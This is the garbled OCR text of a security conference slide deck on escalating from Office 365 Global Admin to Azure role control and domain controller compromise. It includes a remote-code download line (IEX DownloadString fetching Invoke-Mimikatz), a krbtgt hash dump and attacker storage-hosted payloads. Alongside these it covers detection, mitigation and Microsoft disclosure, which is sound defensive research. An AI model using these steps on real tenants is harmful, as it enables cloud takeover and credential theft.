200 OK OK - Returns an HttpResponseMessage with HttpStatusCode 200 


Security 
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u Ryan Hausknecht 
f @Haus3c 


Added a new function, Set-ElevatedPrivileges, to 

PowerZure that will elevate your privileges from AAD 'Global 
Administrator’ to Azure 'User Access Administrator’ as 
outlined by here: via 
REST API call. 


ievate access work? 
ecured independently from one an n ^ x e m 
Azure resources andar From Azure AD to Active -— m. ege, — An Unanticipated At... 
ıpability if you don't have access to Azure subscrip ror | US "i 20 01 9; | Wa S dig Jit US In D ) O x ffic e E 36. 2 and Azu I e : Da ind 
pa 


Jr storage accounts, and you want to use your Glo 


i j 
AT Ir C ~ e 
d E dk 

ess to those resources. e eg U > Go 


vart of the development of the new Trimarc ... 


ithub.com/hausec/PowerZure 
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Compromise Office 365 Global Admin 


Trimarc R&D - Overview 
Trimarc R&D - Overview 


« 


Overview 


Getting started 


Manage 
Users 


Groups 


Switch directory Delete directory 


trimarcrd.com 


Trimarc R&D 


Azure AD for Office 365 


Sign-ins 
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Your role 


Global administrator 


Q 
black hat Admin Account Take Over Defense 


JSA eui 


MFA Your ADMINS! 


e Admin Accounts with MFA Sept 2017: 0.7% 
* Admin Accounts with MFA Sept 2018: 1.7% 


e Admin Accounts with MFA Aug 2019: 7.94%! 


Access management for Azure resources 


atrımart 


ory. Learn more 


ent A LJ S n ti 


(Azure) 
User Access 
Administrator 


(Office 365) Yes 
Global Admin 
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Hacker Account Added to User Access Administrator 


User Access Administrator 


AzureAdmin 


AzureAdmin@trimarcrd.com User Access Administrator © Root (Inherited) 


Azure AD Service Account 


AzureADService@trimarcrd.com User Access Administrator © Root (Inherited) 


Hacker 


Hackergitrimardd com User Access Administrator ® Root (Inherited) 


Sean Metcalf 
sean@trimarcrd.com 


User Access Administrator © Root (Inherited) 
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Azure RBAC Role Monitoring 


Azure CLI 
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VEIRDUOL. AULHBILICALLIUU LO AZUIE «ae 
VERBOSE: Building your Azure drive ... 
PS /home/sean> az role assignment list --role "User Access Administrator" —scope "/" 


[ 
( 


"canDelegate": null, 

"id": "/providers/Microsoft.Authorization/roleAssignments/309cac73-b7b5-4990-a779-2c75e083ddc6", 
"name": "309cac73-b7b5-4990-a779-2c75e083ddc6", 

"principalld": "22ef4fff-699d-4177-9327-2b2c071c1201", 

"principalName": "Hacker@trimarcrd.com", 

"principalType": "User", 


"roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72. 


"roleDefinitionName": "User Access Administrator", 
"scope": nn. 
"type": "Microsoft.Authorization/roleAssignments" 


"canDelegate": null, 

"id": "/providers/Microsoft.Authorization/roleAssignments/cd26d014-4f44-4802-b07d-3cfe28712c07", 
"name": "cd26d014-4f44-4802-b07d-3cfe28712c07", 

"principalld": "42712e25-96f6-4c0e-9a25-6de8c2d04c4c", 

"principalName": "AzureAdmin@trimarcrd.com", 

"principalType": "User", 


"roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c20a72d9", 


"roleDefinitionName": "User Access Administrator", 
"scope": "TS 
"type": "Microsoft.Authorization/roleAssignments" 


"canDelegate": null, 

"id": "/providers/Microsoft.Authorization/roleAssignments/37cc6353-24e9-4554-ad13-4e3bad983f8c", 
"name": "37cc6353-24e9-4554-ad13-4e3bad983f8c", 

"principalld": "71575fad-39b2-475a-b519-314dde65e7cf", 

"principalName": "sean@trimarcrd.com", 

"principalType": "User", 


"roleDefinitionId": "/providers/Microsoft.Authorization/roleDefinitions/18d7d88d-d35e-4fb5-a5c3-7773c2C€ 


"roleDefinitionName": "User Access Administrator", 
"Scope": "7", 
"type": "Microsoft.Authorization/roleAssignments" 


"canDelegate": null, 

"id": "/providers/Microsoft.Authorization/roleAssignments/7daf7191-f4b3-4dle-994c-cbe7518b8a7b", 
"name": "7daf7191-f4b3-4dle-994c-cbe7518b8a7b", 

"principalld": "cdb8f6c8-692e-4109-87e2-a4e7a6c76afa", 
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What About Removal? 


Remove role assignments 


Role assignments created at root scope must be removed by using the command line. Learn more c? 


Azure PowerShell 


Get-AzRoleAssignment | where ($ .RoleDefinitionName -eq "User Access Administrator" ` 
-and $ .SignInName -eq "<username@example.com>" -and $ .Scope -eq "/") 
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Get Azure Owner Rights! 


Type 


Hacker EZE 
Hacker@trimarcrd.com 


Sean Metcalf 
sean@trimarcrd.com 


User 
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Virtual 
Machine 
Contributor 
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^. lets you manage virtual 
machines, but not access to 
them, and not the virtual 
network or storage account 
they're connected to.” 


https://docs.microsoft.com/en-us/azure/role- 
based-access-control/built-in-rolesttvirtual- 


machine-contributor 


Jii... 


Run Command uses the VM ac 


i and for general machine and a 
Operations 


Auto-shutdown 


Virtual dera 


RunPowerShellScript 
Disaster recovery 


Machine 
Contributor 


Update management DisableNLA 


Inventory EnableAdminAccount 


Microsoft.Compute/ Change tracking EnableEMS 
virtualMachines/ Configuration management ... 
runCommand/ 


EnableRemotePS 


Policies 
IPConfig 


x Run command 
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Add Attacker Controlled Account to Virtual 
Machine Contributor 


Virtual Machine Contributor 


Azure AD Service Account 


U 
AzureADService@trimarcrd.com SO 


Virtual Machine Contributor @ 


Hacker = OO 
Hacker@trimarcrd.com Virtual Machine Contributor Q) 
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Run Command Script 
A AcmelODCO1 RunPowerShellScript 


ML + 


e Script execution complete 


Operations 


PowerShell Script 
Auto-shutdown 1 1 -ScriptBlock Knet Localgroup administrators /add $args[@] } -ArgumentList("ACME\HanSolo") 


Backup 

Disaster recovery 
Update management 
Inventory 

Change tracking 
Configuration manag 
Policies 


Run command 


The command completed successfully. 
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PS C:\> Get-ADGroupMember 'Administrators' | select distinguishedName 


distinguishedname 


| Téacme , DC- 10 
GEES ,OU-Service Accounts ‚Dc=theacme A pecie 
CN-InsightMgr , OU= Service Accounts ‚Dc=theacme, DC-io 
CN-ForeFrontAdmin,OU-Service Accounts ,DC-theacme ‚DC=io 
CN-Brightmailsvc,OU-Service Accounts ,DC=theacme , DC=10 
CN=Domain Admins , CN=Users , DC=theacme , DC=10 
CN=Enterprise Admins, CN=Users , DC=theacme , DC=10 
CN-TrimarcAdmin,OU-Admin Accounts ,OU=AD Management. DC=theacme , DC=10 
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jd) Event Properties - Event 4103, PowerShell (Microsoft-Windows-PowerShell) 


General Details 


Commandinvocation(Invoke- Command): "Invoke-Command" 
ParameterBinding(Invoke- Command): name="ScriptBlock"; valuez "net Localgroup administrators /add Sargs[0] " 
ParameterBinding(Invoke- Command): namez " ArgumentList"; value= "ACME\HanSolo" 


Context: 
Severity = Informational 
Host Name - ConsoleHost 
Host Version = 5.1.14393.3053 
Host ID = 9adee254-c238-4d32-9885-c76d9995f4c9 
Host Application = powershell -ExecutionPolicy Unrestricted -File script2.ps1 
Engine Version = 5.1.14393.3053 
Runspace ID = d9c5cd75-ed1e-49fe-b37f-dc9038d30795 
Pipeline ID = 1 
Command Name = Invoke-Command 
Command Type - Cmdlet 
Script Name = CA Packages Plugins WMicrosoft.CPlat.Core.RunCommandWindowsM.1.0 Downloads Nscript2.ps1 
Command Path - 
Sequence Number - 16 
User = ACME\SYSTEM 
Connected User = 
Shell ID = Microsoft.PowerShell 


Log Name: Microsoft-Windows-PowerShell, Urne 

Source: PowerShell (Microsoft-Wind Logged: 7/2019 2:42:53 AM 
Event ID: 4103 Task Category: Beie Pipeline 

Level: Information Keywords: None 

User: SYSTEM Computer: AcmelODCO1.theacme.io 
OpCode: To be used when operation | 


Minare Infarmatinn: Event | an Online Halm 


AcmelODCO1 - Run command Run Command Script 
AcmelODC01 - Run commaı 


Script execution complete 


à PowerShell Script 
Locks 


IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestatio 


Export template $m = Invoke-Mimikatz -Command '"privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit’; 


$m 


Operations 
Auto-shutdown 
Backup 
Disaster recovery 
Update management 
Inventory 
Change tracking 
Configuration management .. 
Policies 


mimikatz(powershell) # lsadump::lsa /inject /name:krbtgt 
Run command Domain : ACME / S-1-5-21-143179592-3749324205-2095737646 


Monitoring RID : 600001f6 (502) 
User : krbtgt 
Insights (preview) 

* Primary 

"7 Alerts NTLM : 81c2c39603f49ef47b6c3df7bb6d6173 
LM ` 
Hash NTLM: 81c2c39603f49ef47b6c3df7bb6d6173 Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 
ntlm- 0: 81c2c39603f49ef47b6c3df7bb6d6173 


Metrics 


Diagnostic settinds 


Import-module 


Connect-AzAccount 


e You have chosen to open: 
Get-AzLocation select P 


= Inv-Mmk.txt 


which is: Text Document (2.1 MB) 


from: https://attackstorage.blob.core.windows.net 


New-AzResourceGroup -Name -Location 


= New-AzStorageAccount -ResourceGroupName ` What should Firefox do with this file? 
-Name é © Open with | Notepad (default) 
-SkuName S 
-Location @ Save File 
Context 


Cancel 


New-AzStorageContainer Name -Context -Permission 


# upload a file 
Set-AzStorageBlobContent -File 
-Container ` 

-Blob 


-Context PS C:\> Get-AzStorageBlob -Container $ContainerName -Context $ctx S , 
\ = Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


AccountName: attackstorage, ContainerName: quickstartblobs 


Name BlobType Length ContentType LastModified AccessTier SnapshotTime 


Inv-Mmk.txt BlockBlob 2206861 application/octet-stream 2020-07-28 17:06:25Z Hot 


New Tab x 4- 


C @ https://attackstorage.blob.core.windows.net/quickstartblobs/Inv-Mmk.txt 


Access management for Azure resources 


AzureAdmin@trimarcrd.com (AzureAdmin@trimarcrd.com) can manage access to all Azure subscriptions and 


management groups in this directory. Learn more 


Yes No 


(Azure) 
Yes 5 User Access Add to Role 
| Administrator 


(Office 365) 
Global Admin 


(Azure) 
Subscription Admin 
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* Companies often have 2 groups managing 
different systems. 


* One team typically manages Active 


Sepa ration of Directory & Azure AD. 


TE * Another team typically manages servers 
Administration on-prem and in the cloud (IAAS). 


* These teams expect that they have 
exclusive control of their respective areas. 
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* Customers usually have no expectation that an Office 
365 Global Administrator has the ability to control 
Azure role membership. 


Microsoft documented Global Administrator as an 
“Office 365 Admin”, not as an Office 365 & potential 
Azure administrator. 


Office 365 (Azure AD) Global Administrators can gain 


: : Azure subscription role administration access by 
W hy IS th IS toggling a single switch. 


. * Azure doesn't have great granular control over who can 
ISSUE run commands on Azure VMs that are sensitive like 


m DO rta nt? Azure hosted Domain Controllers. 


Once the "Access management for Azure resources" bit 
is set, it stays set until the account that toggled the 
setting to "Yes" later changes it to "No". 


Removing the account from Global Administrators does 
not remove the account from "User Access 
Administrator" access either. 
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Detection Key Points 


* Can't detect this setting on Azure AD user accounts using PowerShell, 
portal, or other method. 


* No Office 365/Azure AD logging | can find that states that an Azure AD 
account has set this bit (“Access management for Azure resources’ ). 


* No (Azure AD/O365) Audit Logs logging that clearly identifies this change. 


* Core Directory, DirectoryManagement "Set Company Information" Log 
shows success for the tenant name and the account that performed it. 
However, this only identifies that something changed relating to "Company 
Information" — no detail logged other than "Set Company Information" and 
in the event the Modified Properties section is empty stating "No modified 
properties". 

e Didn't find any default Azure logging after adding this account to the VM 
Contributor role in Azure. 
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Azure AD to Azure Mitigation 


Enforce 


Monitor the Azure AD role “Global Administrator” for membership changes. 


Enforce MFA on all accounts in the Global Administrator role. 


Control the Global Administrator role with Azure AD Privileged Identity 
Manager (PIM). 


Monitor the Azure RBAC role “User Access Administrator” for membership 
changes. 


Ensure sensitive systems like Domain Controllers in Azure are isolated and 
protected as much as possible. 
Ideally, use a separate tenant for sensitive systems. 
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MSRC Reporting Timeline 


Reported to Microsoft in September 2019. 


MSRC responds in early October 2019: 
“Based on [internal] conversations this appears to be By Design and the documentation is being 
updated. “ 


Sent MSRC additional information in mid October 2019 after a day of testing detection and 
potential logging. 


MSRC responds that “most of what you have is accurate” 


Sent MSRC update in late January 2020 letting them know that | would be submitting this as part 
of a larger presentation to Black Hat USA & DEF CON.(2020). 


MSRC acknowledges. 
Sent MSRC notification that | would be sharing this information in this blog. 
Documentation updated — June 2020. 
MSRC Security incident still open as of July 2020. 
| was informed by Microsoft during my interactions with MSRC that they are looking into re-working this 


functionality to resolve some of the shortcomings | identified. 
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How bad can this get? 


— 
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How bad can this get? 
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How bad can this get? 


Attacker takes control of Azure resources 
Removes accounts from all Roles 
Ransom the Azure environment 


Azure Ransomware? 
AzureWare? 
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Next Level 
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Microsoft Azure (Identity Provider) Service Provider) 


AAD SAML Identity 


IAM Roles trusting EEE EE 


SAML IdP 
Azure Active Directory 


E E = err E 


6 Access Panel Azure login endpoint AWS SSO Endpoint 


H 


af AWS Management 
Console 


Client 
using a 
browser 
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Google Cloud Platform 
(GCP) 
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Azure 


Google Cloud Platform 


(GCP) 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


Sean Metcalf | @PyroTek3 | sean@trimarcsecurity.com 


Azure 


Google Cloud Platform 
(GCP) 
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Azure 


Google Cloud Platform 
(GCP) 


Google Cloud Platform 
(GCP) 
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“Don't want all my eggs in one 
basket... 
So now eggs are in all baskets.” 


Conclusion 


* Given that cloud IAAS is similar to on-prem 
virtualization, cloud attacks are similar as well 


e Connection points between on-prem & cloud 
need to be carefully considered. 


* Domain Controllers can be vulnerable no 
matter where they are located (on-prem & in 
the cloud). 


* Authentication flows between on-prem & cloud 
(and Cloud to Cloud!) can be vulnerable. 


* Protecting admin accounts is even more 
important in a cloud-enabled world. 


: , Sean Metcalf (@PyroTek3) 
Slides: Presentations.ADSecurity.org sean (9 Trimarc Security . com 


www.ADSecurity.org 
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